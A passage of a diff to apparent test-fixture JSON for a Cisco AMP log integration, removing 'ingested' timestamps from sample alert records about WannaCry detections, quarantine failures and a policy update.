Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741859\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "severity": 2 
@@ -2623,7 +2592,6 @@ ], "code": "1090519054", "id": "6419214500913742000", - "ingested": "2022-02-02T05:53:17.131271966Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":210000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "severity": 2 
@@ -2713,7 +2681,6 @@ ], "code": "1090519054", "id": "6419214500913742000", - "ingested": "2022-02-02T05:53:17.131272730Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":194000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741855\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "severity": 2 
@@ -2812,7 +2779,6 @@
 ],
 "code": "1090519054",
 "id": "6419214500913742000",
- "ingested": "2022-02-02T05:53:17.131273493Z",
 "kind": "alert",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741857\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}",
 "severity": 2
@@ -2902,7 +2868,6 @@
 ],
 "code": "1090519054",
 "id": "6419214500913742000",
- "ingested": "2022-02-02T05:53:17.131274347Z",
 "kind": "alert",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":163000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}",
 "severity": 2
@@ -2986,7 +2951,6 @@
 ],
 "code": "553648143",
 "id": "6419214500913742000",
- "ingested": "2022-02-02T05:53:17.131275112Z",
 "kind": "alert",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":709000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
 "severity": 2
@@ -3058,7 +3022,6 @@
 ],
 "code": "553648143",
 "id": "6419214492323807000",
- "ingested": "2022-02-02T05:53:17.131275876Z",
 "kind": "alert",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214492323807000,\"timestamp\":1610631810,\"timestamp_nanoseconds\":447000000,\"date\":\"2021-01-14T13:43:30+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "severity": 2
@@ -3136,7 +3099,6 @@
 ],
 "code": "1090519054",
 "id": "6419214488028840000",
- "ingested": "2022-02-02T05:53:17.131276646Z",
 "kind": "alert",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214488028840000,\"timestamp\":1610631809,\"timestamp_nanoseconds\":916000000,\"date\":\"2021-01-14T13:43:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}",
 "severity": 2
@@ -3233,7 +3195,6 @@
 ],
 "code": "1107296257",
 "id": "14945890085425",
- "ingested": "2022-02-02T05:53:17.131277404Z",
 "kind": "alert",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945890085425,\"timestamp\":1610630976,\"timestamp_nanoseconds\":535214029,\"date\":\"2021-01-14T13:29:36+00:00\",\"event_type\":\"Potential Dropper Infection\",\"event_type_id\":1107296257,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610630976,\"start_date\":\"2021-01-14T13:29:36+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "severity": 3,
@@ -3298,7 +3259,6 @@
 "action": "Policy Update",
 "code": "553648130",
 "id": "6412574627503014000",
- "ingested": "2022-02-02T05:53:17.131278174Z",
 "kind": "alert",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412574627503014000,\"timestamp\":1610630889,\"timestamp_nanoseconds\":341000000,\"date\":\"2021-01-14T13:28:09+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
 "severity": 0
@@ -3366,7 +3326,6 @@
 ],
 "code": "2164260880",
 "id": "6419204910251770000",
- "ingested": "2022-02-02T05:53:17.131278929Z",
 "kind": "alert",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":50000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "severity": 2
@@ -3440,7 +3399,6 @@
 ],
 "code": "1090519054",
 "id": "6419204910251770000",
- "ingested": "2022-02-02T05:53:17.131279683Z",
 "kind": "alert",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769885\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "severity": 2
@@ -3526,7 +3484,6 @@
 ],
 "code": "1090519054",
 "id": "6419204910251770000",
- "ingested": "2022-02-02T05:53:17.131280440Z",
 "kind": "alert",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":34000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "severity": 2
@@ -3614,7 +3571,6 @@
 ],
 "code": "2164260880",
 "id": "6419204905956803000",
- "ingested": "2022-02-02T05:53:17.131281215Z",
 "kind": "alert",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802584\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "severity": 2
@@ -3690,7 +3646,6 @@
 ],
 "code": "2164260880",
 "id": "6419204905956803000",
- "ingested": "2022-02-02T05:53:17.131281975Z",
 "kind": "alert",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802583\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "severity": 2
@@ -3766,7 +3721,6 @@
 ],
 "code": "2164260880",
 "id": "6419204905956803000",
- "ingested": "2022-02-02T05:53:17.131282750Z",
 "kind": "alert",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802582\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "severity": 2
@@ -3842,7 +3796,6 @@
 ],
 "code": "2164260880",
 "id": "6419204905956803000",
- "ingested": "2022-02-02T05:53:17.131283534Z",
 "kind": "alert",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802581\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "severity": 2
@@ -3918,7 +3871,6 @@
 ],
 "code": "2164260880",
 "id": "6419204905956803000",
- "ingested": "2022-02-02T05:53:17.131284311Z",
 "kind": "alert",
